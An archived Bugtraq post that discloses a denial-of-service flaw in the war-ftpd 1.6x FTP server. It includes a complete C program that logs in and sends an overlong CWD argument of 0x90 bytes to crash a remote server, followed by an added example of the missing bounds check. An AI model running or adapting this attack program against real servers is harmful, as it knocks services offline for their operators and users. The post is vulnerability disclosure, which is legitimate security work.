Bugtraq mailing list archives
war-ftpd 1.6x DoS
From: crc () SIRIUS IMASY OR JP (Toshimi Makino)
Date: Tue, 1 Feb 2000 16:58:46 +0900
Hello. "war-ftpd" is a very popular FTP server for Windows 95/98/NT. I recently found a DoS problem in "war-ftpd 1.6x".

Outline:
It seems to occur because the bounds check on the MKD/CWD commands, which are used to control the directory, is imperfect. However, as far as I have tested, I could not hijack control of EIP. This is because the RET address cannot be overwritten, since the total buffer capacity seems to be checked properly in 1.66x4 and later. The Access Violation breaks out somewhere between around 533 bytes and 8182 bytes, although the boundary differs depending on the thread that receives the attack.

The versions confirmed to have this vulnerability are as follows: 1.66x4s, 1.67-3
The version in which this vulnerability was not found is as follows: 1.71-0

Test Environments:
Microsoft Windows NT 4.0 Workstation SP6a Japanese version + IE4.0 SP2
Microsoft Windows NT 4.0 Workstation SP5 Japanese version + IE4.0 SP2
Microsoft Windows NT 4.0 Server SP4 Japanese version

Solution:
1.70-1 should be used to solve this problem fundamentally. Because it becomes "Access denied" in 1.71-0, the DoS did not break out.

--- warftpd-dos.c
I wrote a program to reproduce this problem. It applies the DoS attack to a "war-ftpd" server running on a remote host.
/*--------------------------------------------------------------*/
/* war-ftpd 1.66x4s and 1.67-3 DoS sample by crc "warftpd-dos.c"*/
/*--------------------------------------------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>

#define FTP_PORT 21
#define MAXBUF 8182          /* size of the CWD argument (upper boundary reported above) */
//#define MAXBUF 553         /* alternative: the lower boundary */
#define MAXPACKETBUF 32000
#define NOP 0x90

/* atexit() expects a plain C function; WSACleanup() is WINAPI, so wrap it. */
static void cleanup(void)
{
    WSACleanup();
}

int main(int argc, char *argv[])
{
    SOCKET sock;
    unsigned long victimaddr;
    SOCKADDR_IN victimsockaddr;
    WORD wVersionRequested;
    int nErrorStatus;
    static unsigned char buf[MAXBUF], packetbuf[MAXPACKETBUF];
    struct hostent *victimhostent;
    WSADATA wsa;

    /* argv[3] (the password) is used below, so three arguments are required. */
    if (argc < 4) {
        printf("Usage: %s TargetHost UserName Password\n", argv[0]);
        exit(1);
    }

    wVersionRequested = MAKEWORD(1, 1);
    nErrorStatus = WSAStartup(wVersionRequested, &wsa);
    if (nErrorStatus != 0) {
        fprintf(stderr, "Winsock Initialization failed\n");
        exit(-1);
    }
    if (atexit(cleanup)) {
        fprintf(stderr, "atexit(WSACleanup) failed\n");
        exit(-1);
    }

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
        fprintf(stderr, "Can't create socket.\n");
        exit(-1);
    }

    /* Accept either a dotted-quad address or a host name. */
    victimaddr = inet_addr(argv[1]);
    if (victimaddr == INADDR_NONE) {
        victimhostent = gethostbyname(argv[1]);
        if (victimhostent == NULL) {
            fprintf(stderr, "Can't resolve specified host.\n");
            exit(-1);
        }
        victimaddr = *((unsigned long *)(victimhostent->h_addr_list[0]));
    }
    victimsockaddr.sin_family = AF_INET;
    victimsockaddr.sin_addr.s_addr = victimaddr;
    victimsockaddr.sin_port = htons((unsigned short)FTP_PORT);
    memset(victimsockaddr.sin_zero, 0, sizeof(victimsockaddr.sin_zero));
    if (connect(sock, (struct sockaddr *)&victimsockaddr, sizeof(victimsockaddr)) == SOCKET_ERROR) {
        fprintf(stderr, "Connection refused.\n");
        exit(-1);
    }

    printf("Attacking war-ftpd ...\n");

    /* Log in: read the banner, then send USER and PASS. */
    recv(sock, (char *)packetbuf, MAXPACKETBUF, 0);
    sprintf((char *)packetbuf, "USER %s\r\n", argv[2]);
    send(sock, (char *)packetbuf, strlen((char *)packetbuf), 0);
    recv(sock, (char *)packetbuf, MAXPACKETBUF, 0);
    sprintf((char *)packetbuf, "PASS %s\r\n", argv[3]);
    send(sock, (char *)packetbuf, strlen((char *)packetbuf), 0);
    recv(sock, (char *)packetbuf, MAXPACKETBUF, 0);

    /* Send a CWD whose argument is MAXBUF-1 bytes of 0x90: the overlong
       directory argument that causes the Access Violation described above. */
    memset(buf, NOP, MAXBUF);
    buf[MAXBUF - 1] = 0;
    sprintf((char *)packetbuf, "CWD %s\r\n", (char *)buf);
    send(sock, (char *)packetbuf, strlen((char *)packetbuf), 0);
    Sleep(100);

    shutdown(sock, 2);
    closesocket(sock);
    printf("done.\n");
    return 0;
}

----
Toshimi Makino
E-mail:crc () sirius imasy or jp
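An added example (not war-ftpd's or the poster's code) of the server-side bounds check whose absence the post describes: a CWD/MKD handler that measures the directory argument before copying it into its fixed buffer and refuses anything that does not fit, replying 550 in the spirit of the "Access denied" reported for 1.71-0. MAX_PATH_ARG, the reply codes and the function names are assumptions made for this illustration.

```c
/* Added example, not war-ftpd's code: the bounds check on the CWD/MKD
 * argument that the post reports as imperfect in 1.6x. An argument that
 * does not fit the fixed buffer is refused with a 550 reply (modelled on
 * the "Access denied" reported for 1.71-0); limit and codes are assumed. */
#include <string.h>
#define MAX_PATH_ARG 255   /* assumed limit on a directory argument */
enum ftp_reply { FTP_OK = 250, FTP_BAD_SYNTAX = 501, FTP_DENIED = 550 };

/* Handle one received line ("CWD <dir>\r\n" or "MKD <dir>\r\n"): copy
 * the argument into out[outsz] only after measuring it, so an overlong
 * argument never touches the buffer and is never silently truncated. */
int handle_dir_command(const char *line, char *out, size_t outsz)
{
    const char *arg;
    size_t len;
    if (strncmp(line, "CWD ", 4) == 0 || strncmp(line, "MKD ", 4) == 0)
        arg = line + 4;
    else
        return FTP_BAD_SYNTAX;
    len = strcspn(arg, "\r\n");          /* argument ends at CR or LF */
    if (len == 0)
        return FTP_BAD_SYNTAX;
    if (len >= outsz)                    /* no room for the terminator */
        return FTP_DENIED;
    memcpy(out, arg, len);
    out[len] = '\0';
    return FTP_OK;
}

/* Reply for a literal command line, using a correctly sized buffer. */
int reply_for_line(const char *line)
{
    char dir[MAX_PATH_ARG + 1];
    return handle_dir_command(line, dir, sizeof dir);
}

/* Reply for a CWD whose argument is n bytes of 'A' (constructed input);
 * n = 533 and n = 8182 are the boundaries the post reports. */
int reply_for_arg_length(size_t n)
{
    static char line[9000];
    if (n + 7 > sizeof line)
        return -1;
    memcpy(line, "CWD ", 4);
    memset(line + 4, 'A', n);
    memcpy(line + 4 + n, "\r\n", 3);    /* copies the NUL too */
    return reply_for_line(line);
}
```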